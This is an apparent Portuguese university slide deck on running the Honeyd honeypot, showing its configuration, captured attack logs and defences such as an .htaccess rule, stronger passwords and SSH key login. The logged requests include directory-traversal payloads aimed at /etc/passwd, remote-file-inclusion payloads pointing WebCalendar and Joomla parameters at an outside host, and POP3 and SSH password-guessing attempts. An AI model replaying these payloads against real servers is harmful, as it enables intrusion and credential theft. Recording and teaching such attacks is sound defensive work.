Trabalho sobre a implementação de Honeypots recorrendo ao Honeyd

1. Uso de HoneyPots com o Honeyd
Pedro Pereira Ulisses Costa
Criptografia e Seguran¸a de Sistemas de Informa¸˜o
c ca
18 de Dezembro de 2008
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

2. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

3. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

4. O que s˜o HoneyPot’s?
a
Programas que emulam vulnerabilidades conhecidas
Armadilhas para detectar ou impedir ataques
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

5. Tipos de HoneyPot’s
Personalidade
Alta interac¸˜o (high-interaction)
ca
Baixa interac¸˜o (low-interaction)
ca
Modus operandi
Servidor
Cliente
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

6. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

7. Honeyd
Cria¸˜o de hosts virtuais
ca
Configura¸˜o dos hosts
ca
Suporte para mais de 1000 personalidades
Muitas dezenas de scripts para emula¸˜o de servi¸os
ca c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

8. Configura¸˜o do Honeyd
ca
bash > farpd 192.168.1.50 -i eth0
# File : / etc / defaults / honeyd
# Defaults for honeyd initscript
# Correr como deamon
RUN =quot; yes quot;
# Interface de rede onde o honeyd vai escutar pedidos
INTERFACE =quot; eth0 quot;
# Rede que o honeyd simula
NETWORK =192.168.1.50
# Conjunto de opcoes
# -c hostname : port : username : password
OPTIONS =quot; - c localhost :12345: username : password quot;
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

9. O comando -c hostname:port:username:password
Gera¸˜o de estat´
ca ısticas parciais do Honeyd
bash > honeydstats -- os_report / etc / honeypot / os -- port_report / etc / honeypot / port
-- spammer_report / etc / honeypot / spam -- country_report / etc / honeypot / country
-f / etc / honeypot / honeydstats . conf -l localhost -p 12345
# File : / etc / honeypot / honeydstats . conf
# Ficheiro de configuracao do honeydstats
username : password
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

10. Configura¸˜o do HoneyPot(1/2)
ca
# File : / etc / honeypot / honeyd . conf
# Configuracao do honeypot
create win2k
set win2k personality quot; Microsoft Windows 2000 SP2 quot;
set win2k default tcp action reset
set win2k default udp action reset
set win2k default icmp action block
set win2k uptime 3567
add win2k tcp port 21 quot; sh / usr / share / honeyd / scripts / win32 / win2k / msftp . sh $ipsrc
$sport $ipdst $dport quot;
add win2k tcp port 23 quot; perl / usr / share / honeyd / scripts / unix / linux / suse7 .0/ telnetd
. sh quot;
add win2k tcp port 25 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - smtp . sh
$ipsrc $sport $ipdst $dport quot;
add win2k tcp port 80 quot; sh / usr / share / honeyd / scripts / win32 / win2k / iis . sh $ipsrc
$sport $ipdst $dport quot;
add win2k tcp port 110 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - pop3 .
sh $ipsrc $sport $ipdst $dport quot;
add win2k tcp port 143 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - imap .
sh $ipsrc $sport $ipdst $dport quot;
add win2k tcp port 389 quot; sh / usr / share / honeyd / scripts / win32 / win2k / ldap . sh $ipsrc
$sport $ipdst $dport quot;
add win2k tcp port 5901 quot; sh / usr / share / honeyd / scripts / win32 / win2k / vnc . sh $ipsrc
$sport $ipdst $dport quot;
add win2k udp port 161 quot; perl / usr / share / honeyd / scripts / unix / general / snmp / fake -
snmp . pl
public private -- config = scripts / unix / general quot;
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

11. Configura¸˜o do HoneyPot(2/2)
ca
add win2k udp port 137 proxy $ipsrc :137
add win2k udp port 138 proxy $ipsrc :138
add win2k udp port 445 proxy $ipsrc :445
add win2k tcp port 137 proxy $ipsrc :137
add win2k tcp port 138 proxy $ipsrc :138
add win2k tcp port 139 proxy $ipsrc :139
add win2k tcp port 445 proxy $ipsrc :445
bind 192.168.1.50 win2k$
Imposs´ monitorizar portos NETBIOS
ıvel
Grade complexidade
Decis˜o reencaminhar para source
a
Inicializar o nosso HoneyPot:
bash > / etc / init . d / honeyd start
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

12. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

13. Ficheiros
/var/log/honeyd.txt SMTP, Telnet, IMAP, POP3
/var/log/honeypot/web.log HTTP
/var/log/honeypot/honeyd.log Log principal do Honeyd
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

14. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

15. Formato do ficheiro /var/log/honeypot/honeyd.log
Data Protocolo T IPOrig PortOrig IPDst PortDst Info Comment´rio
a
... tcp(6) S 88.44.123.210 3637 ... 139 [Windows XP SP1]
... tcp(6) S 82.155.0.49 22617 ... 139
... tcp(6) E 82.155.1.160 4399 ... 445: 00
... tcp(6) - 82.155.122.18 61582 ... 139: 40 R
... icmp(1) - 80.236.5.27 ...: 3(13): 56
... tcp(6) - 82.154.64.174 34507 ... 445: 40 RA
... tcp(6) - 124.8.74.33 1806 ... 25: 70 FPA [Windows XP SP1]
... tcp(6) - 168.167.152.228 58274 ... 445: 52 FA [Windows XP SP1]
... tcp(6) - 168.167.152.228 58274 ... 445: 52 FA
... tcp(6) - 82.155.57.245 58274 ... 445: 52 PA [Windows XP SP1]
... tcp(6) - 193.136.19.149 58274 ... 445: 52 PA
... tcp(6) - 88.175.73.149 4332 ... 139: 40 R [Windows XP SP1]
... tcp(6) - 82.155.137.139 1230 ... 445: 40 A [Windows XP SP1]
... tcp(6) - 82.155.7.176 2794 ... 445: 40 A
... tcp(6) - 82.155.116.238 3578 ... 23: 60 S [Linux 2.6 .1-7]
... tcp(6) - 124.207.41.198 48804 ... 23: 40 S
... udp(17) - 192.168.1.254 67 ... 68: 298
Data no formato: 2008-12-15-22:59:03.4039
IPDst ´ sempre o mesmo (neste caso) - 192.168.1.50
e
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

16. Formato do ficheiro /var/log/honeypot/honeyd.log
2009 -01 -01 -05:57:28.0971 tcp (6) S 79.25.93.226 46984 192.168.1.50 80
2009 -01 -01 -05:58:40.3750 tcp (6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008
Para TCP e UDP n˜o s˜o gravadas todas as transmiss˜es de
aa o
pacotes
Seria demasiando verboso
Apenas a quantidade transmitida
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

17. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

18. SMTP
Usado do lado do servidor para enviar mensagens
Para receber usams POP3 ou IMAP
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

19. SMTP - HoneyPot
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

20. Comando EHLO em SMTP
Comando para identificar clientes
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

21. Comando EHLO em SMTP
S : 220 bps - pc9 . local . mynet Microsoft ESMTP MAIL Service , Version : 5.0.2195.5329
ready at Sex Jan 9 22:10:11 WET 2009
C : EHLO windows
S : 250 - bps - pc9 . local . mynet Hello [12]
S : 250 - TURN
S : 250 - ATRN
S : 250 - SIZE
S : 250 - ETRN
S : 250 - PIPELINING
S : 250 - DSN
S : 250 - E N H A N C E D S T A TU S C O D E S
S : 250 -8 bitmime
S : 250 - BINARYMIME
S : 250 - CHUNKING
S : 250 - VRFY
S : 250 - X - EXPS GSSAPI NTLM LOGIN
S : 250 - X - EXPS = LOGIN
S : 250 - AUTH GSSAPI NTLM LOGIN
S : 250 - AUTH = LOGIN
S : 250 - X - LINK2STATE
S : 250 - XEXCH50 }
S : 250 OK
Identifica¸˜o por nomes de dominios n˜o reais
ca a
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

22. Spamm em servidores SMTP
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

23. Solu¸oes
c˜
EHLO [host]
verificar se resolvem
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

24. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

25. Ataques
HELO 8 2.155.248.223
MAIL FROM : < jk9l3g4jle@yahoo . com >
RCPT TO : < ss e en n dd 12 0 1@ y ah oo . com . hk >
DATA
Subject : Super webscan open relay check succeded , hostname = 82.155.248.223
2008 -12 -11 -09:45:27.9566 tcp (6) S 124.11.193.219 2774 192.168.1.50 25 [ Windows
XP SP1 ]
2008 -12 -11 -09:46:33.6989 tcp (6) E 124.11.193.219 2774 192.168.1.50 25: 178 920
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

26. Ataques
HELO 82.155.251.32
MAIL FROM : < gt 48m7 g3k 6f@ yah oo . com >
RCPT TO : < ss e en n dd 12 0 1@ y ah oo . com . hk >
DATA
Subject : Super webscan open relay check succeded , hostname = 82.155.251.32
2008 -12 -23 -12:18:11.3939 tcp (6) S 114.44.42.34 2748 192.168.1.50 25 [ Windows XP
SP1 ]
2008 -12 -23 -12:18:11.3953 tcp (6) S 114.44.42.34 2750 192.168.1.50 25 [ Windows XP
SP1 ]
2008 -12 -23 -12:18:12.1966 tcp (6) E 114.44.42.34 2750 192.168.1.50 25: 0 116
2008 -12 -23 -12:18:13.1996 tcp (6) E 114.44.42.34 2748 192.168.1.50 25: 0 232
2008 -12 -23 -12:21:55.1773 tcp (6) S 114.44.42.34 3347 192.168.1.50 25 [ Windows XP
SP1 ]
2008 -12 -23 -12:21:57.1324 tcp (6) E 114.44.42.34 3347 192.168.1.50 25: 0 232
2008 -12 -23 -14:06:30.5003 tcp (6) S 114.44.42.34 1634 192.168.1.50 25 [ Windows XP
SP1 ]
2008 -12 -23 -14:06:30.5023 tcp (6) S 114.44.42.34 1635 192.168.1.50 25 [ Windows XP
SP1 ]
2008 -12 -23 -14:06:43.0390 tcp (6) E 114.44.42.34 1635 192.168.1.50 25: 177 335
2008 -12 -23 -14:06:51.4612 tcp (6) E 114.44.42.34 1634 192.168.1.50 25: 177 418
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

27. Ataques
HELO 8 2.155.103.147
MAIL FROM : < tt c 58 5t t c5 8 5@ ya h oo . com . tw >
RCPT TO : < vjd39hww@yahoo . com . tw >
DATA
Received : from ( [ 1 4 5 . 2 0 0. 2 0 1 . 1 1 4 ] )
by 82 .155.103.147 id <9624303 -98482 >;
Tue , 06 Jan 2009 21:16:04 -0100
Message - ID : < w58 $6a4j1fqc6q@ocjc8ujvz >
From : quot;quot; < t t c5 85 t tc 5 85 @y a ho o . com . tw >
To : < vjd39hww@yahoo . com . tw >
Subject : BC_82 .155.103.147
Date : Tue , 06 Jan 09 21:16:04 GMT
MIME - Version : 1.0
Content - Type : multipart / alternative ;
boundary =quot; - - - -= _ N e x t P a r t _ 0 0 0 _ 0 0 0 D _ 0 1 C 2 C C 6 0 .49 F4EC70 quot;
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

28. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

29. HTTP hit’s
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

30. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

31. User agent: webcollage/1.135a
-- MARK - - ,quot; Mon Dec 15 23:09:00 WET 2008quot; ,quot; IIS / HTTP
quot; ,quot;92.240.68.152quot; ,quot;192.168.1.50quot; ,56886 ,80 ,
quot; GET http :// www . morgangirl . com / pics / land / land1 . jpg HTTP /1.0
User - Agent : webcollage /1.135 a
Referer : http :// random . yahoo . com / fast / ryl
Host : www . morgangirl . com
quot;,
-- ENDMARK - -
Tentativa de obter uma imagem atrav´s do HoneyPot
e
HoneyPotpode ter sido “visto” por um proxy scanner
HoneyPot como um proxy aberto
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

32. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

33. Directory traversal
Tamb´m conhecido como dot dot slash attack (../)
e
Explora a insuficiˆncia de valida¸˜o de pedidos
e ca
Ficheiros do sistema
GET . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1
-- MARK - - ,quot; Sun Jan 4 05:20:57 WET 2009quot; ,quot; IIS / HTTP
quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59706 ,80 ,
quot; GET %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E
%2 E %2 F %2 E %2 E %2 Fetc %2 Fpasswd HTTP /1.1
User - Agent : Nmap NSE
Connection : close
Host : 82.155.127.187
quot;,
-- ENDMARK - -
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

34. Directory traversal
GET . . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1
-- MARK - - ,quot; Sun Jan 4 05:20:58 WET 2009quot; ,quot; IIS / HTTP
quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59711 ,80 ,
quot; GET %2 E %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F
%2 E %2 E %2 F %2 E %2 E %2 Fetc %2 Fpasswd HTTP /1.1
User - Agent : Nmap NSE
Connection : close
Host : 82.155.127.187
quot;,
-- ENDMARK - -
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

35. Directory traversal
GET . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1
-- MARK - - ,quot; Sun Jan 4 05:21:02 WET 2009quot; ,quot; IIS / HTTP
quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59727 ,80 ,
quot;
GET %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E
%2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 Fetc %5 C %2 Fpasswd HTTP /1.1
User - Agent : Nmap NSE
Connection : close
Host : 82.155.127.187
quot;,
-- ENDMARK - -
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

36. Directory traversal
GET . . . . . . . . . . . . . . . . . . . . etc passwd HTTP /1.1
-- MARK - - ,quot; Sun Jan 4 05:21:04 WET 2009quot; ,quot; IIS / HTTP
quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59740 ,80 ,
quot; GET %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E
%2 E %5 C %2 E %2 E %5 Cetc %5 Cpasswd HTTP /1.1
User - Agent : Nmap NSE
Connection : close
Host : 82.155.127.187
quot;,
-- ENDMARK - -
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

37. Directory traversal
GET // etc / passwd HTTP /1.1
-- MARK - - ,quot; Sun Jan 4 05:20:59 WET 2009quot; ,quot; IIS / HTTP
quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59700 ,80 ,
quot; GET %2 F %2 Fetc %2 Fpasswd HTTP /1.1
User - Agent : Nmap NSE
Connection : close
Host : 82.155.127.187
quot;,
-- ENDMARK - -
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

38. Conclus˜o
a
No HoneyPot n˜o foi bem sucedido
a
Sistema de baixa interactividade
No nosso HoneyPot erro 302 Object moved
Utiliza¸˜o de NMap scripting engine
ca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

39. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

40. Morfeus Scanner
Procura vulnerabilidades PHP
Vulnerabilidades conhecidas
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

41. Morfeus Scanner - WebCalendar
Cria¸˜o de calend´rios online
ca a
Vulnerabilidade no ficheiro send reminder.php
-- MARK - - ,quot; Wed Dec 24 16:07:29 WET 2008quot; ,quot; IIS / HTTP
quot; ,quot;74.52.10.34quot; ,quot;192.168.1.50quot; ,54941 ,80 ,
quot; GET / webcalendar / tools / send_reminders . php ? noSet =0& includedir = http
: / / 2 17 .2 0 .1 7 2. 12 9 / twiki / a . gif ?/ HTTP /1.1
Accept : */*
Accept - Language : en - us
Accept - Encoding : gzip , deflate
User - Agent : Morfeus Scanner
Host : 82.155.248.190
Connection : Close
quot;,
-- ENDMARK - -
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

42. Morfeus Scanner - Mambo Joomla
CMS’s muito conhecido
O atacante pretende definir a vari´vel
a
mosConfig absolute path do ficheiro index.php
-- MARK - - ,quot; Wed Dec 24 16:07:34 WET 2008quot; ,quot; IIS / HTTP
quot; ,quot;74.52.10.34quot; ,quot;192.168.1.50quot; ,55438 ,80 ,
quot; GET / shop / index . php ? option = com_registration & task = register // boutique / index2 . php ?
_REQUEST =& _REQUEST %5 boption %5 d = com_content & _REQUEST %5 bItemid %5 d =1& GLOBALS =&
m o s C o n f i g _ a b s o l u t e _ p a t h = http :/ / 21 7 .2 0. 1 72 . 12 9/ twiki / a . gif ?/ HTTP /1.1
Accept : */*
Accept - Language : en - us
Accept - Encoding : gzip , deflate
User - Agent : Morfeus Scanner
Host : 82.155.248.190
Connection : Close
quot;,
-- ENDMARK - -
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

43. Prevenir ataques do Morfeus Scanner
Uma maneira de bloquear este tipo de ataques vindos do MFS ´ e
adicionar as seguintes linhas de c´digo no ficheiro “.htaccess” na
o
pasta do website.
# Start of . htaccess change .
RewriteEngine On
RewriteCond %{ HTTP_USER_AGENT } ^ Morfeus
RewriteRule ^.* $ - [ F ]
# End of . htaccess change .
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

44. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

45. Tentativa de brute force no servidor POP3
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

46. Tentativa de brute force no servidor POP3
...
-- MARK - - ,quot; Mon Dec 22 11:34:48 WET 2008quot; ,quot; exchange / POP3
quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54678 ,110 ,
quot; USER root
PASS root
quot;,
-- ENDMARK - -
-- MARK - - ,quot; Mon Dec 22 11:34:49 WET 2008quot; ,quot; exchange / POP3
quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54729 ,110 ,
quot; USER root
PASS root1
quot;,
-- ENDMARK - -
-- MARK - - ,quot; Mon Dec 22 11:34:50 WET 2008quot; ,quot; exchange / POP3
quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54731 ,110 ,
quot; USER staff
PASS staff
quot;,
-- ENDMARK - -
-- MARK - - ,quot; Mon Dec 22 11:34:52 WET 2008quot; ,quot; exchange / POP3
quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54774 ,110 ,
quot; USER root
PASS 12345
quot;,
-- ENDMARK - -
-- MARK - - ,quot; Mon Dec 22 11:34:53 WET 2008quot; ,quot; exchange / POP3
quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54774 ,110 ,
quot; USER www
PASS www
quot;,
-- ENDMARK - -
...
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

47. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

48. SSH
Aqui est´ um gr´fico que mostra as tentativas de usernames:
a a
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

49. SSH
E o seguinte gr´fico mostra as tentativas de passwords:
a
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

50. Sum´rio
a
1 Introdu¸˜o
ca
HoneyPot’s
Honeyd
2 Log
Log principal do Honeyd
3 SMTP
Open mail relay
4 HTTP
webcollage/1.135a
Directory traversal
Morfeus Scanner
WebCalendar
Mambo/Joomla
Prevenir ataques do Morfeus Scanner
Ataque ao POP3
SSH
5 A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

51. A amea¸a
c
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

52. Port scanning
Descobrir m´quinas e respectivos portos
a
Cria¸˜o de pacotes personalizados
ca
Dificil de dominar
NMap - insecure.org
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

53. Port scanning
Open ou Accepted: A m´quina enviou uma resposta a indicar
a
que um servi¸o est´ a escutar aquele porto;
c a
Closed, Denied ou Not Listening : A m´quina enviou uma
a
resposta a indicar que qualquer conex˜o no porto ser´ negada;
a a
Filtered, Dropped ou Blocked: N˜o houve resposta por parte
a
da m´quina.
a
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

54. Port scanning
Tipos de t´cnicas
e
TCP/SYN
TCP Connect
UDP
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

55. TCP Connect
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

56. Port scanning
Optimiza¸˜o
ca
golden@golden - laptop :~ $ sudo nmap - sS - sV 192.168.100.0/24
...
Nmap finished : 256 IP addresses (29 hosts up ) scanned in 2033.375 seconds
golden@golden - laptop :~ $ sudo nmap - sS - sV - P0 192.168.100.0/24
...
Nmap finished : 256 IP addresses (32 hosts up ) scanned in 2038.191 seconds
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

57. Ataque
For¸a bruta / Dicion´rios
c a
Explora¸˜o de vulnerabilidades
ca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

58. SSH
Porto 22
Atacado em For¸a bruta / Dicion´rios
c a
cat /var/log/auth.log
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

59. SSH - log
Dec 24 01:24:46 golden - laptop sshd [23906]: Invalid user oracle from
89.235.152.18
Dec 24 01:24:46 golden - laptop sshd [23906]: pam_unix ( ssh : auth ) : check pass ; user
unknown
Dec 24 01:24:46 golden - laptop sshd [23906]: pam_unix ( ssh : auth ) : authentication
failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18
Dec 24 01:24:48 golden - laptop sshd [23906]: Failed password for invalid user
oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 golden - laptop sshd [23908]: reverse mapping checking getaddrinfo
for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK -
IN ATTEMPT !
Dec 24 01:26:01 golden - laptop sshd [23963]: Invalid user test from 89.235.152.18
Dec 24 01:26:01 golden - laptop sshd [23963]: pam_unix ( ssh : auth ) : check pass ; user
unknown
Dec 24 01:26:01 golden - laptop sshd [23963]: pam_unix ( ssh : auth ) : authentication
failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18
Dec 24 01:26:04 golden - laptop sshd [23963]: Failed password for invalid user test
from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:05 golden - laptop sshd [23965]: reverse mapping checking getaddrinfo
for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK -
IN ATTEMPT !
Dec 24 01:26:21 golden - laptop sshd [23975]: Invalid user cvsuser from
89.235.152.18
Dec 24 01:26:21 golden - laptop sshd [23975]: pam_unix ( ssh : auth ) : check pass ; user
unknown
Dec 24 01:26:21 golden - laptop sshd [23975]: pam_unix ( ssh : auth ) : authentication
failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18
Dec 24 01:26:22 golden - laptop sshd [23975]: Failed password for invalid user
cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:26:24 golden - laptop sshd [23977]: reverse mapping checking getaddrinfo
for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK -
IN ATTEMPT ! Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

60. SSH
Defesa:
IPTables
passwords mais fortes
Autentica¸˜o RSA
ca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

61. SSH
password m´
ınimo de 8 caracteres
password nao triviais
combina¸˜es alfanum´ricas
co e
mnem´nica: “Um Whiskey-Cola vale 3 euros no BA!” =
o
“UW-Cv3enBA!”
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

62. SSH
http://www.passwordmeter.com/
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

63. SSH - Autentica¸˜o RSA
ca
Geramos o par de chaves com o comando “ssh-keygen -t rsa”.
1
De seguida s˜o criados os ficheiros /.ssh/id rsa (chave
a
privada) e /.ssh/id rsa.pub (chave p´blica)
u
Em cada m´quina onde nos quisermos ligar (destino),
a
2
colocamos a “id rsa.pub” gerada em /.ssh/authorized keys
concatenando o conte´do desta forma por exemplo: “cat
u
id rsa.pub >> /.ssh/authorized keys”
Em cada m´quina de onde nos quisermos ligar (origem),
a
3
colocamos a “id rsa” em /.ssh/
S´ falta desactivar o login baseado em password ao adicionar
o
4
a linha “PasswordAuthentication no” em /etc/ssh/sshd config
